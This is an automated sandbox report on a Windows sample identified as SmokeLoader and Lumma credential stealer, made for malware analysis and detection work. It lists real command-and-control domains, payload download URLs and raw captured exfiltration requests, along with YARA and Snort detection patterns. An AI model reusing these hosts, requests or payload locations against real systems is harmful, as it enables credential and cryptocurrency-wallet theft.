Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1468481
MD5:0fc784b6c538e7c4a5a4f4bcd8068859
SHA1:8340c0914ec651c3e4ffc7682162154505fc5f8a
SHA256:77ba6812b4e9223398d31476512a19ce12c60cf8c9d139e4578f3f19563e0d52
Tags:exe
Infos:

Detection

LummaC, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected LummaC Stealer
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to read the PEB
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3484 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0FC784B6C538E7C4A5A4F4BCD8068859)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 8FDD.exe (PID: 4628 cmdline: C:\Users\user\AppData\Local\Temp\8FDD.exe MD5: BD2EAC64CBDED877608468D86786594A)
      • WerFault.exe (PID: 6572 cmdline: C:\Windows\system32\WerFault.exe -u -p 2580 -s 7124 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • crwjtgt (PID: 3524 cmdline: C:\Users\user\AppData\Roaming\crwjtgt MD5: 0FC784B6C538E7C4A5A4F4BCD8068859)
  • explorer.exe (PID: 1260 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "foodypannyjsud.shop"], "Build id": "bOKHNM--"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000003.2115559211.000000000196E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2006931443.00000000045B1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000005.00000002.2006931443.00000000045B1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1722703723.0000000002BA2000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x78af:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          Click to see the 17 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\crwjtgt, CommandLine: C:\Users\user\AppData\Roaming\crwjtgt, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\crwjtgt, NewProcessName: C:\Users\user\AppData\Roaming\crwjtgt, OriginalFileName: C:\Users\user\AppData\Roaming\crwjtgt, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\crwjtgt, ProcessId: 3524, ProcessName: crwjtgt

          Snort Signatures

          Timestamp:07/06/24-06:16:38.176260
          SID:2054185
          Source Port:49743
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/06/24-06:16:45.926836
          SID:2054185
          Source Port:49752
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/06/24-06:16:50.213157
          SID:2054185
          Source Port:49758
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/06/24-06:16:38.140129
          SID:2054184
          Source Port:55523
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:07/06/24-06:16:43.790837
          SID:2054185
          Source Port:49750
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/06/24-06:16:42.679399
          SID:2054185
          Source Port:49749
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/06/24-06:16:39.810313
          SID:2054185
          Source Port:49745
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/06/24-06:16:47.352529
          SID:2054185
          Source Port:49754
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/06/24-06:16:41.209865
          SID:2054185
          Source Port:49747
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: https://foodypannyjsud.shop/oAvira URL Cloud: Label: malware
          Source: http://gebeus.ru/tmp/index.phpAvira URL Cloud: Label: malware
          Source: https://foodypannyjsud.shop/api)Avira URL Cloud: Label: malware
          Source: http://cx5519.com/tmp/index.phpAvira URL Cloud: Label: malware
          Source: contintnetksows.shopAvira URL Cloud: Label: malware
          Source: http://evilos.cc/tmp/index.phpAvira URL Cloud: Label: malware
          Source: ellaboratepwsz.xyzAvira URL Cloud: Label: malware
          Source: swellfrrgwwos.xyzAvira URL Cloud: Label: malware
          Source: https://foodypannyjsud.shop/apiTAvira URL Cloud: Label: malware
          Source: https://foodypannyjsud.shop/apiSAvira URL Cloud: Label: malware
          Source: foodypannyjsud.shopAvira URL Cloud: Label: malware
          Source: pedestriankodwu.xyzAvira URL Cloud: Label: malware
          Source: https://foodypannyjsud.shop/F9Avira URL Cloud: Label: malware
          Source: https://foodypannyjsud.shop/neAvira URL Cloud: Label: malware
          Source: towerxxuytwi.xyzAvira URL Cloud: Label: malware
          Source: https://foodypannyjsud.shop/apiAvira URL Cloud: Label: malware
          Source: https://foodypannyjsud.shop/F9RAvira URL Cloud: Label: malware
          Source: https://foodypannyjsud.shop/piAvira URL Cloud: Label: malware
          Source: http://office-techs.biz/tmp/index.phpAvira URL Cloud: Label: malware
          Source: penetratedpoopp.xyzAvira URL Cloud: Label: malware
          Source: https://foodypannyjsud.shop/Avira URL Cloud: Label: malware
          Source: potterryisiw.shopAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeAvira: detection malicious, Label: HEUR/AGEN.1313486
          Found malware configuration
          Source: 00000000.00000002.1722473100.00000000029B0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}
          Source: 6.2.8FDD.exe.850000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "foodypannyjsud.shop"], "Build id": "bOKHNM--"}
          Multi AV Scanner detection for domain / URL
          Source: gebeus.ruVirustotal: Detection: 15%Perma Link
          Source: evilos.ccVirustotal: Detection: 18%Perma Link
          Source: foodypannyjsud.shopVirustotal: Detection: 19%Perma Link
          Source: http://gebeus.ru/tmp/index.phpVirustotal: Detection: 17%Perma Link
          Source: contintnetksows.shopVirustotal: Detection: 17%Perma Link
          Source: http://cx5519.com/tmp/index.phpVirustotal: Detection: 12%Perma Link
          Source: http://evilos.cc/tmp/index.phpVirustotal: Detection: 17%Perma Link
          Source: ellaboratepwsz.xyzVirustotal: Detection: 15%Perma Link
          Source: swellfrrgwwos.xyzVirustotal: Detection: 17%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeReversingLabs: Detection: 79%
          Multi AV Scanner detection for submitted file
          Source: file.exeVirustotal: Detection: 43%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.9% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\crwjtgtJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Sample uses string decryption to hide its real strings
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: pedestriankodwu.xyz
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: towerxxuytwi.xyz
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: ellaboratepwsz.xyz
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: penetratedpoopp.xyz
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: swellfrrgwwos.xyz
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: contintnetksows.shop
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: foodypannyjsud.shop
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: potterryisiw.shop
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: foodypannyjsud.shop
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: TeslaBrowser/5.5
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: - Screen Resoluton:
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: - Physical Installed Memory:
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: Workgroup: -
          Source: 6.2.8FDD.exe.850000.0.unpackString decryptor: bOKHNM--
          Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49752 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49758 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49763 version: TLS 1.2

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2054184 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (foodypannyjsud .shop) 192.168.2.4:55523 -> 1.1.1.1:53
          Source: TrafficSnort IDS: 2054185 ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI) 192.168.2.4:49743 -> 188.114.97.3:443
          Source: TrafficSnort IDS: 2054185 ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI) 192.168.2.4:49745 -> 188.114.97.3:443
          Source: TrafficSnort IDS: 2054185 ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI) 192.168.2.4:49747 -> 188.114.97.3:443
          Source: TrafficSnort IDS: 2054185 ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI) 192.168.2.4:49749 -> 188.114.97.3:443
          Source: TrafficSnort IDS: 2054185 ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI) 192.168.2.4:49750 -> 188.114.97.3:443
          Source: TrafficSnort IDS: 2054185 ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI) 192.168.2.4:49752 -> 188.114.97.3:443
          Source: TrafficSnort IDS: 2054185 ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI) 192.168.2.4:49754 -> 188.114.97.3:443
          Source: TrafficSnort IDS: 2054185 ET TROJAN Observed Lumma Stealer Related Domain (foodypannyjsud .shop in TLS SNI) 192.168.2.4:49758 -> 188.114.97.3:443
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.159.133.233 443Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: pedestriankodwu.xyz
          Source: Malware configuration extractorURLs: towerxxuytwi.xyz
          Source: Malware configuration extractorURLs: ellaboratepwsz.xyz
          Source: Malware configuration extractorURLs: penetratedpoopp.xyz
          Source: Malware configuration extractorURLs: swellfrrgwwos.xyz
          Source: Malware configuration extractorURLs: contintnetksows.shop
          Source: Malware configuration extractorURLs: foodypannyjsud.shop
          Source: Malware configuration extractorURLs: potterryisiw.shop
          Source: Malware configuration extractorURLs: foodypannyjsud.shop
          Source: Malware configuration extractorURLs: http://evilos.cc/tmp/index.php
          Source: Malware configuration extractorURLs: http://gebeus.ru/tmp/index.php
          Source: Malware configuration extractorURLs: http://office-techs.biz/tmp/index.php
          Source: Malware configuration extractorURLs: http://cx5519.com/tmp/index.php
          Source: Joe Sandbox ViewIP Address: 77.221.157.163 77.221.157.163
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 58.151.148.90 58.151.148.90
          Source: Joe Sandbox ViewASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR
          Source: Joe Sandbox ViewASN Name: VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: global trafficHTTP traffic detected: GET /wp-content/images/pic2.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: foodypannyjsud.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: foodypannyjsud.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: foodypannyjsud.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: foodypannyjsud.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: foodypannyjsud.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1257Host: foodypannyjsud.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584434Host: foodypannyjsud.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: foodypannyjsud.shop
          Source: global trafficHTTP traffic detected: GET /attachments/1253399732433195008/1258946128448327812/Crypted.exe?ex=6689e473&is=668892f3&hm=8a4a5d7faf9a541161a67629af15ee492b44a297fba72b8c381671e290b63b29& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xtocgtyybbctmfi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpcdupihqakj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmyyrubejsckxrog.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qoivhnmynkjuuwj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jtduqsdpealdr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dpjoxuhlavoox.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdlrafionfniv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gccqwiqvbuvikqp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmklqbpjgqk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mckdxvknpnq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yuynggabmew.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xqvppjhqsfe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: gebeus.ru
          Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ploihvdtbwudndea.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://buuohrwrsnx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: gebeus.ru
          Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdehhwddskytmp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: gebeus.ru
          Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
          Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
          Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
          Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /wp-content/images/pic2.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
          Source: global trafficHTTP traffic detected: GET /attachments/1253399732433195008/1258946128448327812/Crypted.exe?ex=6689e473&is=668892f3&hm=8a4a5d7faf9a541161a67629af15ee492b44a297fba72b8c381671e290b63b29& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
          Source: global trafficDNS traffic detected: DNS query: evilos.cc
          Source: global trafficDNS traffic detected: DNS query: gebeus.ru
          Source: global trafficDNS traffic detected: DNS query: mussangroup.com
          Source: global trafficDNS traffic detected: DNS query: foodypannyjsud.shop
          Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
          Source: global trafficDNS traffic detected: DNS query: api.msn.com
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: foodypannyjsud.shop
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ef Data Ascii: r
